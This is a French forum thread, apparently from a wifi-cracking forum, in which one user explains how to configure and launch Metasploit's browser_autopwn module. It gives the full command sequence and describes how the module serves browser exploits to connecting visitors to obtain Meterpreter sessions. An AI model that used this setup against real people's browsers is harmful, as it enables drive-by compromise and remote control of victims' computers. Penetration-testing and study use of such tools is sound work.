Browser_autopwn Help

Benzilla · 06-12-2013 17:41:47

Bonjour ,
Je m'interesse au module Browser_autopwn ....
Je n'ai pas trouver de tuto sur le sujet sad
Et comble de l'histoire c'est quand j'ai tous configurer (lhost,lport,uripath)
Tous mais "exploit" ne se lance pas sad
Si quelqu'un a un tuto et ou la solution à mon problème cela serais GENIAL smile

Fuji · 08-12-2013 11:59:15

Il faut taper run et non pas exploit pour le lancer, car c'est un module de type auxiliary. Voici comment il se configure:

use auxiliary/server/browser_autopwn
set LHOST 192.168.1. ton IP
set SRVPORT 80 il va créer un serveur en écoute, ici le port est 80
set URIPATH /  tu peux choisir une url ou laisse comme ça
run

Une fois lancer, il va t'indiquer des URLs à utiliser et dés qu'un client se connecte sur un lien (c-à-d un navigateur) Metasploit va tenter les exploits à sa disposition concernant les navigateurs et voir s'il trouve une faille à exploiter (il sait quel type de navigateur se connecte à lui en analysant l'en-tête http, "user-agent" plus exactement) et tu auras ainsi une session Meterpreter, si tout va bien !

Parce que la majeur partie des exploits que comporte Metasploit et en particulier ceux destinés aux navigateurs sont comme les yaourts, ils périment très vite smile

Dernière modification par Fuji (25-11-2014 08:28:11)

Benzilla · 08-12-2013 12:13:00

Merci beaucoup Fuji ....
Le sujet est donc résolu smile
Merci encore !

Crack-wifi.com FORUM

Annonce

#1 06-12-2013 17:41:47